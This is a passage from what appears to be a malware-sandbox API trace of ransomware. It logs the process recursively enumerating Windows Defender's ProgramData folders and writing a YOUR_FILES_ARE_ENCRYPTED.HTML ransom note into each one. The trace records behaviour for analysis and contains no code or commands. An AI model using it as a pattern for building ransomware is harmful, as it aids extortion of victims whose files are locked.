lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*" [0157.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.350] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.350] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.350] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.350] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows 
Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0157.350] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\localcopy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.351] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.353] CloseHandle (hObject=0x5a0) returned 1 [0157.354] GetProcessHeap () returned 0x270000 [0157.355] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.355] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Quarantine", cAlternateFileName="QUARAN~1")) returned 1 [0157.355] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine") returned 56 [0157.355] GetProcessHeap () returned 0x270000 [0157.355] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.355] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows 
Defender\\Quarantine" [0157.355] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*" [0157.355] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.355] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.355] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4e927dd, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4e927dd, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.355] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.356] 
wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0157.356] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\quarantine\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.356] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.358] CloseHandle (hObject=0x5a0) returned 1 [0157.359] GetProcessHeap () returned 0x270000 [0157.360] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.360] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Scans", cAlternateFileName="")) returned 1 [0157.360] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans") returned 51 [0157.360] GetProcessHeap () returned 0x270000 [0157.360] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.360] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans" | out: 
lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans" [0157.360] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*" [0157.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.361] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.361] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="History", cAlternateFileName="")) 
returned 1 [0157.361] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History") returned 59 [0157.361] GetProcessHeap () returned 0x270000 [0157.361] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.361] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History" [0157.361] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*" [0157.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.361] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) 
returned 1 [0157.362] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5cf0c63e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CacheManager", cAlternateFileName="CACHEM~1")) returned 1 [0157.362] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 72 [0157.362] GetProcessHeap () returned 0x270000 [0157.362] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0157.363] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0157.363] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*" [0157.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5cf0c63e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, 
ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0157.363] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5cf0c63e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.364] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5cf0c63e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.364] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0157.364] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0157.364] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.365] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, 
nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0157.367] CloseHandle (hObject=0x4a8) returned 1 [0157.368] GetProcessHeap () returned 0x270000 [0157.369] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0157.370] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Service", cAlternateFileName="")) returned 1 [0157.370] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 67 [0157.370] GetProcessHeap () returned 0x270000 [0157.370] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0157.370] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0157.370] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*" [0157.370] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", 
lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0157.370] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.370] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.370] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0157.370] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0157.370] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows 
defender\\scans\\history\\service\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.371] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0157.374] CloseHandle (hObject=0x4a8) returned 1 [0157.374] GetProcessHeap () returned 0x270000 [0157.375] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0157.375] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Service", cAlternateFileName="")) returned 0 [0157.375] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.375] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0157.375] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.376] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, 
lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.378] CloseHandle (hObject=0x58c) returned 1 [0157.379] GetProcessHeap () returned 0x270000 [0157.380] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.380] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="History", cAlternateFileName="")) returned 0 [0157.380] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.380] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0157.380] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.381] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.383] CloseHandle (hObject=0x5a0) returned 1 [0157.384] GetProcessHeap () returned 0x270000 [0157.385] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.385] FindNextFileW 
(in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x5cdb59dc, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cdb59dc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Support", cAlternateFileName="")) returned 1 [0157.385] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support") returned 53 [0157.385] GetProcessHeap () returned 0x270000 [0157.385] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.385] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support" [0157.385] lstrcatW (in: 